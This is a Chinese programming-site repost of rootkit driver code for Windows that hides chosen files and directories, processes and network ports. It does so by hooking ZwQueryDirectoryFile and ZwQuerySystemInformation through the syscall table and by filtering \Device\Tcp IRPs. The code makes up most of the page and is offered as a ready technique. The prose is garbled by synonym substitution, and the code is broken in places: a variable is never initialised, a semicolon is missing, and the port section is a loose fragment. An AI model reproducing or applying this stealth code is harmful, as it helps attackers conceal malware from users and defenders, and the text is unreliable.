当前位置:七道奇文章资讯编程技术VC/C++编程
日期:2011-03-22 13:55:00  来源:本站整理

躲藏肆意进程、目录/文件、注册表、端口[VC/C++编程]

赞助商链接



  本文“躲藏肆意进程、目录/文件、注册表、端口[VC/C++编程]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:

查找进程,目录/文件,注册表等操作系统将终究调用 ZwQueryDirectoryFile,ZwQuerySystemInformation,ZwXXXValueKey 等函数.要想拦阻这些函数到达躲藏目的,需先自己实现以上函数,并改正系统保护的一个SYSCALL 表使之指向自己预先定义的函数.因 SYSCALL 表在用户层不可见,所以要写 DRIVE 在 RING 0 下才可改正.关于若何改正已有文章具体介绍过,这里不在详述.(可以拜见 sysinternals.com 或 WebCrazy 所写的文章).查找端口用的是 TDI 查询.TDI 导出了两个设备 \\Device\\Tcp 与 \\Device\\Udp.我们可以操纵设备过滤驱动的办法写一个 DRIVE 把这两个设备的全部 IRP 包接纳过来举行处理后再传给下层驱动.以到达躲藏肆意端口的目的.上述提到的办法不是新东西,是在N年前就已经有的老技术.俺目前将它贴出来只不过为了充分下版面,灌注水罢了.高手们还是别看了.下面是我 DRIVE 中躲藏肆意进程,目录/文件,端口代码片段.

(注册表操作在 RegMon 中写的很具体,这里就不列出了)

typedef struct _FILETIME
{
  DWORD dwLowDateTime;
  DWORD dwHighDateTime;
}FILETIME;
typedef struct _DirEntry
{
  DWORD dwLenToNext;
  DWORD dwAttr;
  FILETIME ftCreate, ftLastAccess, ftLastWrite;
  DWORD dwUnknown[ 2 ];
  DWORD dwFileSizeLow;
  DWORD dwFileSizeHigh;
  DWORD dwUnknown2[ 3 ];
  WORD wNameLen;
  WORD wUnknown;
  DWORD dwUnknown3;
  WORD wShortNameLen;
  WCHAR swShortName[ 12 ];
  WCHAR suName[ 1 ];
} DirEntry, *PDirEntry;
struct _SYSTEM_THREADS
{
  LARGE_INTEGER KernelTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER CreateTime;
  ULONG WaitTime;
  PVOID StartAddress;
  CLIENT_ID ClientIs;
  KPRIORITY Priority;
  KPRIORITY BasePriority;
  ULONG ContextSwitchCount;
  ULONG ThreadState;
  KWAIT_REASON WaitReason;
};
struct _SYSTEM_PROCESSES
{
  ULONG NextEntryDelta;
  ULONG ThreadCount;
  ULONG Reserved[6];
  LARGE_INTEGER CreateTime;
  LARGE_INTEGER UserTime;
  LARGE_INTEGER KernelTime;
  UNICODE_STRING ProcessName;
  KPRIORITY BasePriority;
  ULONG ProcessId;
  ULONG InheritedFromProcessId;
  ULONG HandleCount;
  ULONG Reserved2[2];
  VM_COUNTERS VmCounters;
  IO_COUNTERS IoCounters;
  struct _SYSTEM_THREADS Threads[1];
};
// 躲藏目录/文件
NTSTATUS HookZwQueryDirectoryFile(
IN HANDLE hFile,
IN HANDLE hEvent OPTIONAL,
IN PIO_APC_ROUTINE IoApcRoutine OPTIONAL,
IN PVOID IoApcContext OPTIONAL,
OUT PIO_STATUS_BLOCK pIoStatusBlock,
OUT PVOID FileInformationBuffer,
IN ULONG FileInformationBufferLength,
IN FILE_INFORMATION_CLASS FileInfoClass,
IN BOOLEAN bReturnOnlyOneEntry,
IN PUNICODE_STRING PathMask OPTIONAL,
IN BOOLEAN bRestartQuery)
{
  NTSTATUS rc;
  CHAR aProcessName[80];
  ANSI_STRING ansiFileName,ansiDirName;
  UNICODE_STRING uniFileName;
  PP_DIR ptr;
  WCHAR ParentDirectory[1024] = {0};
  int BytesReturned;
  PVOID Object;
// 履行旧的ZwQueryDirectoryFile函数
  rc=((ZWQUERYDIRECTORYFILE)(OldZwQueryDirectoryFile))(hFile,hEvent,IoApcRoutine,
    IoApcContext,pIoStatusBlock,FileInformationBuffer,FileInformationBufferLength,
    FileInfoClass,bReturnOnlyOneEntry,PathMask,bRestartQuery);
  if(NT_SUCCESS(rc))
  {
   PDirEntry p;
   PDirEntry pLast;
   BOOL bLastOne;
   int found;
   p = (PDirEntry)FileInformationBuffer; // 将查找出来后果赋给构造
   pLast = NULL;
 
   do
   {
    bLastOne = !( p->dwLenToNext );
    RtlInitUnicodeString(&uniFileName,p->suName);
    RtlUnicodeStringToAnsiString(&ansiFileName,&uniFileName,TRUE);
    RtlUnicodeStringToAnsiString(&ansiDirName,&uniFileName,TRUE);
    RtlUpperString(&ansiFileName,&ansiDirName);
   
    found=0;
    // 在链表中查找能否包含当前目录
    for(ptr = list_head; ptr != NULL; ptr = ptr->next)
    {
     if (ptr->flag != PTR_HIDEDIR) continue;
     if( RtlCompareMemory( ansiFileName.Buffer, ptr->name,strlen(ptr->name) ) == strlen(ptr->name))
     {
      found=1;
      break;
     }
    }//end for
    // 假如链表中包含当前目录,躲藏
    if(found)
    {
     if(bLastOne)
     {
      if(p == (PDirEntry)FileInformationBuffer )
      {
       rc = 0x80000006; //躲藏
      }
      else
       pLast->dwLenToNext = 0;
      break;
     }
     else
     {
      int iPos = ((ULONG)p) - (ULONG)FileInformationBuffer;
      int iLeft = (DWORD)FileInformationBufferLength - iPos - p->dwLenToNext;
      RtlCopyMemory( (PVOID)p, (PVOID)( (char *)p + p->dwLenToNext ), (DWORD)iLeft );
      continue;
     }
    }
    pLast = p;
    p = (PDirEntry)((char *)p + p->dwLenToNext );
   }while( !bLastOne );
  RtlFreeAnsiString(&ansiDirName);
  RtlFreeAnsiString(&ansiFileName);
  }
  return(rc);
}
// 躲藏进程
NTSTATUS HookZwQuerySystemInformation(
IN ULONG SystemInformationClass,
IN PVOID SystemInformation,
IN ULONG SystemInformationLength,
OUT PULONG ReturnLength)
{
  NTSTATUS rc;
  ANSI_STRING process_name,process_uname,process_name1,process_name2;
  BOOL g_hide_proc = TRUE;
  CHAR aProcessName[80];
  PP_DIR ptr;
  int found;
  // 履行旧的ZwQuerySystemInformation函数
  rc = ((ZWQUERYSYSTEMINFORMATION)(OldZwQuerySystemInformation))(SystemInformationClass,
      SystemInformation,SystemInformationLength,ReturnLength );
  if(NT_SUCCESS(rc ))
  {
   if( g_hide_proc && (5 == SystemInformationClass))
   {
    // 将查找出来后果赋给构造
    struct _SYSTEM_PROCESSES *curr = (struct _SYSTEM_PROCESSES *)SystemInformation;
    struct _SYSTEM_PROCESSES *prev = NULL;
    // 遍历进程
    while(curr)
    {
     if((0 < process_name.Length) && (255 > process_name.Length))
     {
      found=0;
      // 遍历链表
      for(ptr=list_head;ptr!=NULL;ptr=ptr->next )
      {
       if(ptr->flag != PTR_HIDEPROC) continue ;
       if(memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
       {
        found =1;
       }
      }
      // 判断假如是躲藏进程名则覆盖掉此进程名
      while(found)
      {
       if(prev)
       {
        if(curr->NextEntryDelta)
        {
         prev->NextEntryDelta += curr->NextEntryDelta;
        }
        else
        {
         prev->NextEntryDelta = 0;
        }
       }
       else
       {
        if(curr->NextEntryDelta)
        {
         (char *)SystemInformation += curr->NextEntryDelta;
        }
        else
        {
         SystemInformation = NULL;
        }
       }
       if(curr->NextEntryDelta)
        ((char *)curr += curr->NextEntryDelta);
       else
       {
         curr = NULL;break;
       }
       // 遍历链表
       found = 0;
       for (ptr=list_head;ptr!=NULL;ptr=ptr->next )
       {
        if (ptr->flag != PTR_HIDEPROC) continue ;
        if (memcmp(process_name.Buffer,ptr->name,strlen(ptr->name)) == 0)
        {
         found = 1;
        }
       }
      }
     }
     if(curr != NULL)
     {
      prev = curr;
      if(curr->NextEntryDelta) ((char *)curr += curr->NextEntryDelta);
      else curr = NULL;
     }
    }
   }
  }
  return(rc);
}
//躲藏端口
PDEVICE_OBJECT m_TcpgetDevice;
PDEVICE_OBJECT TcpDevice;
UNICODE_STRING TcpDeviceName;
PDRIVER_OBJECT TcpDriver;
PDEVICE_OBJECT TcpgetDevice;
PDEVICE_OBJECT FilterDevice
PDRIVER_DISPATCH Empty;
NTSTATUS status;
Empty = DriverObject->MajorFunction[IRP_MJ_CREATE];
RtlInitUnicodeString( &TcpDeviceName, L"\\Device\\Tcp");
//得到已有的设备指针
status = IoGetDeviceObjectPointer( &TcpDeviceName,FILE_ALL_ACCESS,&FileObject,&TcpDevice);
if(!NT_SUCCESS(status))
{
  DbgPrint("IoGetDeviceObjectPointer error!\n");
  return status;
}
DbgPrint("IoGetDeviceObjectPointer ok!\n");
// 成立设备
status = IoCreateDevice( DriverObject,sizeof(DEVICE_EXTENSION),NULL,
      FILE_DEVICE_UNKNOWN,0,FALSE,&FilterDevice);
if(!NT_SUCCESS(status))
{
  return status;
}
// 加入设备
TcpgetDevice = IoAttachDeviceToDeviceStack( FilterDevice, TcpDevice);
if(!TcpgetDevice)
{
  IoDeleteDevice(FilterDevice);
  DbgPrint("IoAttachDeviceToDeviceStack error!\n");
  return STATUS_SUCCESS;
}
m_TcpgetDevice = TcpgetDevice;
// 加到过滤函数中处理
for(i=0;i<IRP_MJ_MAXIMUM_FUNCTION;i++)
{
  if((TcpDriver->MajorFunction[i]!=Empty)&&(DriverObject->MajorFunction[i]==Empty))
  {
   DriverObject->MajorFunction[i] = PassThrough;
  }
}
ObDereferenceObject(FileObject);
NTSTATUS PassThrough( IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp )
{
  NTSTATUS status;
  PIO_STACK_LOCATION pIrpStack;
  pIrpStack = IoGetCurrentIrpStackLocation( Irp );
//如是查询则完成 IRP
if ( pIrpStack->Parameters.DeviceIoControl.IoControlCode == QUERY_INFORMATION_EX)
{
  //这里可以近一步判断某个端口
  Irp->IoStatus.Status=STATUS_SUCCESS;
  IoCompleteRequest(Irp,IO_NO_INCREMENT);
  return STATUS_SUCCESS;
}
//复制当前 IRP
IoCopyCurrentIrpStackLocationToNext(Irp);
IoSetCompletionRoutine( Irp,GenericCompletion,NULL,TRUE,TRUE,TRUE);
//传送
return IoCallDriver( m_TcpgetDevice, Irp);
}


  以上是“躲藏肆意进程、目录/文件、注册表、端口[VC/C++编程]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 躲藏肆意进程、目录/文件、注册表、端口
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .